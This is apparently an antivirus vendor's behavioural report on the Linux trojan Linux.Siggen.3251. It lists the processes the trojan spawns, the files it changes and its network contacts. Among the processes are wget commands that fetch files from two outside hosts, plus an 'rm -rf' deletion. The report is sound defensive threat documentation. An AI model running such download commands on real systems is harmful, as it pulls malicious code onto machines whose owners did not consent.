Linux.Siggen.3251
Added to the Dr.Web virus database: 2020-07-30
Virus description added: 2020-07-30
Technical Information
Malicious functions:
Launches itself as a daemon
Launches processes:
- /bin/bash <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' "$@" <SAMPLE_FULL_PATH>
- <SAMPLE_FULL_PATH>
- /bin/bash <SAMPLE_FULL_PATH> -c
- clear
- ip route get 8.8.8.8
- awk -Fsrc NR==1{split($
- rm -rf V1.0
- wget -q http://vipscript.cf/lisans/folder/V1.0
- wget -q http://dizaynsunucum.org/lisans/folder/vip/
- sleep 0.4
- apt-get -y install figlet
- /usr/bin/dpkg --print-foreign-architectures
- /usr/lib/apt/methods/http
- /bin/sh -c /usr/bin/apt-listchanges --apt || test $? -ne 10
- /usr/bin/dpkg --assert-multi-arch
- /usr/bin/apt-listchanges --apt
- /bin/sh -c /usr/sbin/dpkg-preconfigure --apt || true
- /usr/sbin/dpkg-preconfigure --apt
- locale charmap
- sh -c stty -a 2>/dev/null
- stty -a
- /usr/bin/dpkg --status-fd 17 --unpack --auto-deconfigure /var/cache/apt/archives/figlet_2.2.5-2_amd64.deb
- dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/figlet_2.2.5-2_amd64.deb
- dpkg-deb ##/var/cache/apt/archives/figlet_2.2.5-2_amd64.deb /var/lib/dpkg/tmp.ci
- tar -x -f - --warning=no-timestamp
Kills the following processes:
- /usr/lib/apt/methods/http
Performs operations with the file system:
Modifies file access rights:
- /var/cache/apt/pkgcache.bin.9qhiwH
- /var/log/apt/term.log
- /var/log/apt/history.log
- /var/lib/dpkg/tmp.ci/md5sums
- /var/lib/dpkg/tmp.ci/control
- /var/lib/dpkg/tmp.ci/prerm
- /var/lib/dpkg/tmp.ci/postinst
Creates folders:
Deletes folders:
Creates or modifies files:
- /var/lib/dpkg/lock
- /var/cache/apt/pkgcache.bin.9qhiwH
- /var/cache/apt/archives/lock
- /var/cache/apt/archives/partial/figlet_2.2.5-2_amd64.deb
- /var/lib/apt/listchanges.db
- /var/log/apt/term.log
- /var/log/apt/history.log
- /var/lib/dpkg/updates/tmp.i
- /var/lib/dpkg/triggers/Lock
- /var/log/dpkg.log
- /var/lib/dpkg/tmp.ci/md5sums
- /var/lib/dpkg/tmp.ci/control
- /var/lib/dpkg/tmp.ci/prerm
- /var/lib/dpkg/tmp.ci/postinst
- /var/lib/dpkg/tmp.ci//control
- /var/lib/dpkg/tmp.ci//md5sums
- /var/lib/dpkg/tmp.ci//prerm
- /var/lib/dpkg/tmp.ci//postinst
- /dev/pts/0
Deletes files:
- /usr/games/V1.0
- /var/cache/apt/pkgcache.bin
- /var/lib/dpkg/reassemble.deb
Locks files:
- /var/cache/debconf/config.dat
- /var/cache/debconf/passwords.dat
- /var/cache/debconf/templates.dat
Network activity:
Establishes connection:
HTTP GET requests:
- ft#.##.######.#####ebian/pool/main/f/figlet/figlet_2.2.5-2_amd64.deb
DNS ASK:
- vi###ript.cf
- di####sunucum.org
- ft#.##.debian.org
Other:
Collects CPU information
Collects RAM information